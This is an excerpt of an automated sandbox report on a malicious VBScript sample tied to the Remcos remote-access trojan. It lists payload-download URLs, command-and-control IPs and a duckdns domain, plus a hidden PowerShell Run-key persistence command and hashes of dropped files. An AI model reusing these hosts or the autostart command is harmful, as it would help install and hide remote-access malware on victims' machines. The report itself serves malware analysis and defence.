                          http://91.202.233.169/Tak/Reg/Marz/Expowershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2351244189.00000155D3D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDD117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEBA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEB8DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA3A64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA392E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355E2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CB84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.informacionoportuna.com/wp-content/uploads/2024/powershell.exe, 00000004.00000002.2090885360.00000155C52CA000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://r11.o.lencr.org0#powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C88A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3715892947.000001C0543BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.informacionoportuna.compowershell.exe, 00000004.00000002.2090885360.00000155C4FDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C09E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C872000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.microsoftpowershell.exe, 00000014.00000002.3008770894.0000013DBA5E4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://go.micropowershell.exe, 00000004.00000002.2090885360.00000155C4C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C09E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C2FC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://informacionoportuna.compowershell.exe, 00000004.00000002.2090885360.00000155C52A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DS1.TXTpowershell.exe, 00000004.00000002.2090885360.00000155C419D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C1151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAF5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://91.202.233.169powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C1151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAF5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://r11.i.lencr.org/0=powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C88A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3715892947.000001C0543BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore6powershell.exe, 00000001.00000002.2712472865.0000015713145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC208000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.informacionoportuna.com/wp-content/uploads/2024/09/dXpowershell.exe, 00000013.00000002.2417662894.00000240C089E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C281000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://wicroft.compowershell.exe, 00000013.00000002.2411972909.00000240C032A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.informacionoportuna.compowershell.exe, 00000004.00000002.2090885360.00000155C52A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://x1.c.lencr.org/0powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2742802158.000001C03A2BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://x1.i.lencr.org/0powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2742802158.000001C03A2BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2351244189.00000155D3D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDD117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEBA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEB8DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA3A64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA392E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355E2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CB84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://oneget.orgXpowershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://91.202.HXpowershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.2712472865.000001571315A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC938C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A172F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A172DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F863E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F863C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E127284000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E12729D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC051F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2814694674.000002CE3076E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2712472865.000001571318C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC938C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC25B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A17317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F8648A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E1272DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC056A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://oneget.orgpowershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          91.202.233.169
                          unknownRussian Federation
                          9009M247GBtrue
                          15.235.85.194
                          informacionoportuna.comUnited States
                          71HP-INTERNET-ASUStrue
                          45.135.232.38
                          dcmxz.duckdns.orgRussian Federation
                          49392ASBAXETNRUtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519308
                          Start date and time:2024-09-26 10:56:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:41
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Sample name:sostener.vbs
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winVBS@68/59@5/3
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 50
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 199.232.214.172
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target RegSvcs.exe, PID 3872 because it is empty
                          • Execution Graph export aborted for target RegSvcs.exe, PID 7484 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 1120 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 5776 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 6572 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7996 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: sostener.vbs
                          TimeTypeDescription
                          04:56:59API Interceptor285x Sleep call for process: powershell.exe modified
                          04:57:17API Interceptor1x Sleep call for process: RegSvcs.exe modified
                          10:57:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                          10:57:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          91.202.233.169sostener.vbsGet hashmaliciousRemcosBrowse
                          • 91.202.233.169/Tak/Reg/Marz/SH/Rcm.txt
                          sostener.vbsGet hashmaliciousRemcosBrowse
                          • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
                          envifa.vbsGet hashmaliciousRemcosBrowse
                          • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
                          15.235.85.194sostener.vbsGet hashmaliciousRemcosBrowse
                            45.135.232.38172698102496c864a187aff64295ab0b70d4e0148fc884b8fdef49a9c604553959f0c4197e421.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              1726981024afb0b5261027cf8cb56ba2e74288f35f8a8f03f714e141da3004c24e1b6d3c16555.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                decode_3c3a2e81bb9b9ea689c7c8d6aa9e24c0af55f3915e14295a64263688c83f4ab7.exeGet hashmaliciousRemcosBrowse
                                  sostener.vbsGet hashmaliciousRemcosBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    dcmxz.duckdns.org1726981024afb0b5261027cf8cb56ba2e74288f35f8a8f03f714e141da3004c24e1b6d3c16555.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 45.135.232.38
                                    bg.microsoft.map.fastly.netHPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                    • 199.232.214.172
                                    https://pdftomuchmattersupdatings-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wappGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    http://linksapp.top:443Get hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    https://www.cognitoforms.com/f/elMiWbNXi0G8lOV9LA6SDg/1Get hashmaliciousHTMLPhisherBrowse
                                    • 199.232.214.172
                                    http://tiktoksc.xyz/Get hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    https://qwehikd-asdu.xyz/Get hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    https://qwoms-dei3.top/Get hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    https://saihdqq-yadq.xyz/Get hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ASBAXETNRU#U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                    • 194.87.45.14
                                    #U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                    • 194.87.45.14
                                    #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                    • 194.87.45.14
                                    #U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                    • 194.87.45.14
                                    172698102496c864a187aff64295ab0b70d4e0148fc884b8fdef49a9c604553959f0c4197e421.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                    • 45.135.232.38
                                    1726981024afb0b5261027cf8cb56ba2e74288f35f8a8f03f714e141da3004c24e1b6d3c16555.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 45.135.232.38
                                    SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elfGet hashmaliciousMiraiBrowse
                                    • 212.196.169.14
                                    file.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 212.192.12.222
                                    http://104.219.233.181/fwd/P2Q9MjU2Mjc5JmVpPTcyODUyMjcyJmlmPTUxNDQyJm5kcD03OTgzJnNpPTE3JmxpPTIyMzczGet hashmaliciousPhisherBrowse
                                    • 45.147.195.6
                                    decode_3c3a2e81bb9b9ea689c7c8d6aa9e24c0af55f3915e14295a64263688c83f4ab7.exeGet hashmaliciousRemcosBrowse
                                    • 45.135.232.38
                                    M247GBDRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exeGet hashmaliciousXWormBrowse
                                    • 104.250.180.178
                                    6122.scr.exeGet hashmaliciousRemcosBrowse
                                    • 104.250.180.178
                                    6122.scr.exeGet hashmaliciousRemcosBrowse
                                    • 104.250.180.178
                                    DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exeGet hashmaliciousXWormBrowse
                                    • 104.250.180.178
                                    file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                    • 91.202.233.158
                                    file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                    • 91.202.233.158
                                    SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elfGet hashmaliciousUnknownBrowse
                                    • 158.46.140.169
                                    BNE400266900B - RLS SO# W317pdf.scr.exeGet hashmaliciousRemcosBrowse
                                    • 104.250.180.178
                                    BNE400266900A - BL NO.BNE400266900.pdf.scr.exeGet hashmaliciousXWormBrowse
                                    • 104.250.180.178
                                    jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                    • 91.202.233.158
                                    HP-INTERNET-ASUSsostener.vbsGet hashmaliciousRemcosBrowse
                                    • 15.235.85.194
                                    http://WWW.LUTHERANSONLINE.COM/SHALOMICGet hashmaliciousUnknownBrowse
                                    • 15.235.211.177
                                    rsJtZBgpwG.elfGet hashmaliciousMiraiBrowse
                                    • 15.178.34.35
                                    https://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 15.156.174.66
                                    Facturas de pago 003839,72011,030184.bat.exeGet hashmaliciousAgentTeslaBrowse
                                    • 15.235.118.15
                                    https://credit.fb-business.com/Get hashmaliciousUnknownBrowse
                                    • 15.235.209.42
                                    http://t.yesware.com/tt/0ffd1f55c7e6a0ced56d29538e63fa334cce8cd2/340be3fbd5588b7ae8659d398f6ebdbe/6b6b3691935bcccf7dc7e5bf662a5dca/www.techcare.cl/pt/?conceicao.martins@cellnextelecom.ptGet hashmaliciousUnknownBrowse
                                    • 15.235.4.255
                                    Lista de embalaje y direcci#U00f3n de DHL.bat.exeGet hashmaliciousAgentTeslaBrowse
                                    • 15.235.118.15
                                    D0F48A0632B6C451791F4257697E861961F06A6F.htmlGet hashmaliciousUnknownBrowse
                                    • 15.204.241.81
                                    firmware.i686.elfGet hashmaliciousUnknownBrowse
                                    • 15.157.89.240
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0esostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 15.235.85.194
                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                    • 15.235.85.194
                                    asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 15.235.85.194
                                    SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 15.235.85.194
                                    CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 15.235.85.194
                                    RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 15.235.85.194
                                    RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                    • 15.235.85.194
                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 15.235.85.194
                                    450230549.exeGet hashmaliciousAgentTeslaBrowse
                                    • 15.235.85.194
                                    450230549.exeGet hashmaliciousUnknownBrowse
                                    • 15.235.85.194
                                    No context
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):71954
                                    Entropy (8bit):7.996617769952133
                                    Encrypted:true
                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                    Malicious:false
                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):328
                                    Entropy (8bit):3.253995428229511
                                    Encrypted:false
                                    SSDEEP:6:kKiuL/L9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:J/iDImsLNkPlE99SNxAhUe/3
                                    MD5:B8DC732FE01ED0EBDFD88C76B4EB7FDB
                                    SHA1:3C39E73AA7DBD671B3E1C1F515A48E3D85D5E2FB
                                    SHA-256:6E6597B298E46A033D1854B745D67EE413EDBB400F7CD70AAE6710DDCB1F56E8
                                    SHA-512:E1EDF847AE03E0D53738E53DC5D5B66AEE1298DBD4CBA742163E3961EE367AE0A39394917FA5F941CEDD4F300630A09B09677F38FBC3E79C2813A385C2A46EEF
                                    Malicious:false
                                    Preview:p...... ..........k.....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):425
                                    Entropy (8bit):5.353683843266035
                                    Encrypted:false
